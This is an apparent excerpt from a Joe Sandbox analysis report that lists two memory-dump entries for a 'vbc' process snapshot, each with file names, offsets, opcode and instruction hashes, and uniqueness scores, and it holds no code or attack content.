                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction ID: a1ed9eed13e03912d0d6a23270943e9adcf9a7ef4bd620ccbf7c9dcdf303532e
                                                              • Opcode Fuzzy Hash: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction Fuzzy Hash: E811B476404284DFDB01CF10D9C4B26BFB2FB94324F24C6A9D9080B756C336D85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction ID: 9aa570a1000abeab480cb06df113f532a67cb35fcaa6b75e3f43d33400a28b4b
                                                              • Opcode Fuzzy Hash: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction Fuzzy Hash: 4611D376504284CFDF12CF10D9C4B26BFB2FB94324F2486A9D9050B616C33AD85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%